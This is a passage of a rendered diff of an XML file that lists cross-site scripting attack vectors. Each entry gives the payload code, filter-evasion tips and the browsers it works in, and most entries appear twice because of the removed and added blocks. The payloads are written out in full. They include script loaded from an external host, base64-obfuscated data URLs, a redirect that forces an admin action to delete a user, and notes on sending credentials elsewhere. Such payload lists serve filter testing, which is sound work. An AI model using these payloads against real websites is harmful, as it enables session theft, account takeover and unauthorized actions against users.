- <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV background-image 1</name>
- <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code>
- <desc>Div background-image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV background-image 2</name>
- <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code>
- <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV expression</name>
- <code><DIV STYLE="width: expression(alert('XSS'));"></code>
- <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>FRAME</name>
- <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code>
- <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IFRAME</name>
- <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code>
- <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>INPUT Image</name>
- <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code>
- <desc>INPUT Image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG w/JavaScript Directive</name>
- <code><IMG SRC="javascript:alert('XSS');"></code>
- <desc>Image XSS using the JavaScript directive.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG No Quotes/Semicolon</name>
- <code><IMG SRC=javascript:alert('XSS')></code>
- <desc>No quotes and no semicolon</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Dynsrc</name>
- <code><IMG DYNSRC="javascript:alert('XSS');"></code>
- <desc>IMG Dynsrc</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Lowsrc</name>
- <code><IMG LOWSRC="javascript:alert('XSS');"></code>
- <desc>IMG Lowsrc</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Embedded commands 1</name>
- <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code>
- <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Embedded commands 2</name>
- <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code>
- <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG STYLE w/expression</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<xss>
+ <attack>
+ <name>XSS Locator</name>
+ <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code>
+ <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XSS Quick Test</name>
+ <code>'';!--"<XSS>=&{()}</code>
+ <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Alert()</name>
+ <code><SCRIPT>alert('XSS')</SCRIPT></code>
+ <desc>Basic injection attack</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Source File</name>
+ <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>
+ <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Char Code</name>
+ <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>
+ <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BASE</name>
+ <code><BASE HREF="javascript:alert('XSS');//"></code>
+ <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BGSOUND</name>
+ <code><BGSOUND SRC="javascript:alert('XSS');"></code>
+ <desc>BGSOUND</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BODY background-image</name>
+ <code><BODY BACKGROUND="javascript:alert('XSS');"></code>
+ <desc>BODY image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BODY ONLOAD</name>
+ <code><BODY ONLOAD=alert('XSS')></code>
+ <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV background-image 1</name>
+ <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code>
+ <desc>Div background-image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV background-image 2</name>
+ <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code>
+ <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV expression</name>
+ <code><DIV STYLE="width: expression(alert('XSS'));"></code>
+ <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>FRAME</name>
+ <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code>
+ <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IFRAME</name>
+ <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code>
+ <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>INPUT Image</name>
+ <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code>
+ <desc>INPUT Image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG w/JavaScript Directive</name>
+ <code><IMG SRC="javascript:alert('XSS');"></code>
+ <desc>Image XSS using the JavaScript directive.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG No Quotes/Semicolon</name>
+ <code><IMG SRC=javascript:alert('XSS')></code>
+ <desc>No quotes and no semicolon</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Dynsrc</name>
+ <code><IMG DYNSRC="javascript:alert('XSS');"></code>
+ <desc>IMG Dynsrc</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Lowsrc</name>
+ <code><IMG LOWSRC="javascript:alert('XSS');"></code>
+ <desc>IMG Lowsrc</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Embedded commands 1</name>
+ <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code>
+ <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Embedded commands 2</name>
+ <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code>
+ <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG STYLE w/expression</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code>exp/*<XSS STYLE='no\xss:noxss("*//*");
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code>
- <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>List-style-image</name>
- <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code>
- <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG w/VBscript</name>
- <code><IMG SRC='vbscript:msgbox("XSS")'></code>
- <desc>VBscript in an image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>LAYER</name>
- <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code>
- <desc>Layer (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>Livescript</name>
- <code><IMG SRC="livescript:[code]"></code>
- <desc>Livescript (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>US-ASCII encoding</name>
- <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
- <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser>
- </attack>
- <attack>
- <name>META</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code>
- <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>META w/data:URL</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>
- <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>META w/additional URL parameter</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code>
- <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Mocha</name>
- <code><IMG SRC="mocha:[code]"></code>
- <desc>Mocha (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT</name>
- <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code>
- <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT w/Embedded XSS</name>
- <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code>
- <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Embed Flash</name>
- <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code>
- <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT w/Flash 2</name>
- <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code>
- <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE</name>
- <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code>
- <desc>STYLE tag (Older versions of Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/Comment</name>
- <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code>
- <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/Anonymous HTML</name>
- <code><XSS STYLE="xss:expression(alert('XSS'))"></code>
- <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/background-image</name>
- <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code>
- <desc>STYLE tag using background-image.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/background</name>
- <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code>
- <desc>STYLE tag using background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Stylesheet</name>
- <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code>
- <desc>Stylesheet</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 1</name>
- <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code>
- <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 2</name>
- <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code>
- <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 3</name>
- <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code>
- <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 4</name>
- <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code>
- <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>TABLE</name>
- <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code>
- <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>TD</name>
